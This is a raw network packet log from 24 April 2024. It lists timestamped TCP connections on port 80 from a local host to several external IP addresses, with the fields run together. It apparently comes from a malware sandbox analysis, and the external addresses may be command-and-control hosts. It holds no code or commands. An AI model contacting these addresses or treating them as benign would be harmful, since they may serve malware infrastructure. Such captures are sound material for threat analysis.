                                                                    Apr 24, 2024 12:29:42.108347893 CEST5026480192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:42.283071995 CEST5026480192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:43.300833941 CEST5026580192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:43.579794884 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:43.579957008 CEST5026580192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:43.581357002 CEST5026580192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:43.851231098 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:43.858886957 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:44.049843073 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:44.049856901 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:44.050127983 CEST5026580192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:44.052046061 CEST5026580192.168.11.20157.7.107.63
                                                                    Apr 24, 2024 12:29:44.331137896 CEST8050265157.7.107.63192.168.11.20
                                                                    Apr 24, 2024 12:29:57.469789028 CEST5026680192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:29:57.646874905 CEST8050266203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:29:57.647073984 CEST5026680192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:29:57.648444891 CEST5026680192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:29:57.825330973 CEST8050266203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:29:58.030041933 CEST8050266203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:29:58.030055046 CEST8050266203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:29:58.030189991 CEST5026680192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:29:59.154313087 CEST5026680192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:00.171835899 CEST5026780192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:00.348937035 CEST8050267203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:00.349113941 CEST5026780192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:00.350575924 CEST5026780192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:00.527429104 CEST8050267203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:00.537965059 CEST8050267203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:00.537975073 CEST8050267203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:00.538130999 CEST5026780192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:01.856782913 CEST5026780192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:02.874311924 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.051192045 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.051405907 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.054003000 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.054053068 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.054099083 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.231183052 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.231314898 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.231323004 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.231410027 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.231679916 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.231981993 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.231991053 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.232146025 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.232198954 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.408545017 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.408782959 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.408809900 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.409010887 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.409076929 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.409147024 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.409157991 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.409348011 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:03.410121918 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.410219908 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.585637093 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.586280107 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.586291075 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:03.586510897 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:04.559375048 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:04.704473019 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:04.704546928 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:04.704665899 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:04.704796076 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:04.736246109 CEST8050268203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:04.736490011 CEST5026880192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:05.576891899 CEST5026980192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:05.754632950 CEST8050269203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:05.754898071 CEST5026980192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:05.756561041 CEST5026980192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:05.933320999 CEST8050269203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:06.017165899 CEST8050269203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:06.017179012 CEST8050269203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:06.017683029 CEST5026980192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:06.019642115 CEST5026980192.168.11.20203.161.49.193
                                                                    Apr 24, 2024 12:30:06.196281910 CEST8050269203.161.49.193192.168.11.20
                                                                    Apr 24, 2024 12:30:11.420052052 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:11.662580967 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:11.662743092 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:11.664141893 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:11.905589104 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210313082 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210330009 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210355043 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210366964 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210479021 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210596085 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210606098 CEST805027067.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:12.210643053 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:12.210786104 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:13.166842937 CEST5027080192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.184370041 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.425746918 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.425915956 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.427356958 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.668682098 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935365915 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935463905 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935475111 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935487032 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935586929 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935596943 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935688972 CEST805027167.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:14.935734034 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:14.935902119 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:15.931885958 CEST5027180192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:16.949397087 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.190910101 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.191081047 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.193630934 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.193727970 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435336113 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435422897 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435466051 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.435544014 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435734034 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.435858011 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.436364889 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.436556101 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677226067 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677300930 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677428007 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677469015 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677551985 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677617073 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677727938 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677809000 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.677911997 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.677977085 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:17.678081989 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678219080 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678364992 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.678550005 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.918950081 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.918962002 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919044971 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919270039 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919277906 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:17.919548035 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:18.696933985 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:18.977432013 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.714399099 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.747643948 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747764111 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747822046 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.747903109 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.747929096 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748059988 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748071909 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748096943 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748131037 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748140097 CEST805027267.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.748243093 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.748269081 CEST5027280192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.955838919 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:19.956012964 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:19.957406044 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.198682070 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.464931011 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.464942932 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:20.465323925 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.467170000 CEST5027380192.168.11.2067.225.140.26
                                                                    Apr 24, 2024 12:30:20.708446980 CEST805027367.225.140.26192.168.11.20
                                                                    Apr 24, 2024 12:30:25.795216084 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.064095974 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.064244986 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.065649033 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:26.334134102 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334211111 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334220886 CEST8050274137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:26.334414959 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:27.569942951 CEST5027480192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.587435961 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.856321096 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:28.856447935 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:28.857877970 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:29.126668930 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126777887 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126787901 CEST8050275137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:29.126981974 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:30.366166115 CEST5027580192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.383706093 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.659266949 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.659527063 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.662067890 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.662153959 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.937657118 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937724113 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937732935 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937844038 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937854052 CEST8050276137.220.252.40192.168.11.20
                                                                    Apr 24, 2024 12:30:31.937905073 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:30:31.937963963 CEST5027680192.168.11.20137.220.252.40
                                                                    Apr 24, 2024 12:31:24.412659883 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:25.416663885 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.434297085 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.599287987 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.599458933 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.600867033 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.765803099 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.765889883 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.765898943 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.766144991 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.768116951 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.932986975 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:34.823193073 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.123769045 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.123999119 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.125386953 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.425863028 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428301096 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428380966 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428595066 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.430459023 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.730806112 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:40.446736097 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:40.757066965 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:40.757256031 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:40.758810997 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:41.069983959 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:41.069997072 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:41.070164919 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:42.272332907 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.289854050 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.600075960 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.600215912 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.601685047 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.912746906 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.912760973 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.912904978 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:45.115446091 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.132962942 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.443185091 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.443341970 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445893049 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445915937 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445993900 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756078005 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756159067 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756169081 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756297112 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756302118 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756412983 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756421089 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756470919 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756639957 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756810904 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.757061958 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.802485943 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.060930967 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061136007 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061291933 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061372042 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061382055 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061415911 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061546087 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061577082 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061682940 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061717033 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.365963936 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366067886 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366189957 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366323948 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366451025 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366462946 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366600990 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.958540916 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:48.976080894 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.280709028 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.280986071 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.282418013 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.618956089 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.618972063 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.618995905 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619097948 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619112015 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619131088 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619143009 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619251013 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619256020 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619266987 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619278908 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619332075 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619416952 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619492054 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.929543972 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929665089 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929677963 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929706097 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929727077 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929748058 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929761887 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929775953 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929924965 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.930083990 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.931988955 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:50.242129087 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:32:11.393058062 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.567780018 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.567962885 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.569351912 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.744616032 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744729042 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744740009 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744750023 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744895935 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:13.078047991 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.095520973 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.270433903 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.270678997 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.272114992 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.447753906 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447904110 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447916031 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447926044 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.448153973 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:15.780560017 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.798154116 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.972309113 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:16.972537994 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975297928 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975320101 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975368023 CEST5029780192.168.11.20108.186.8.155
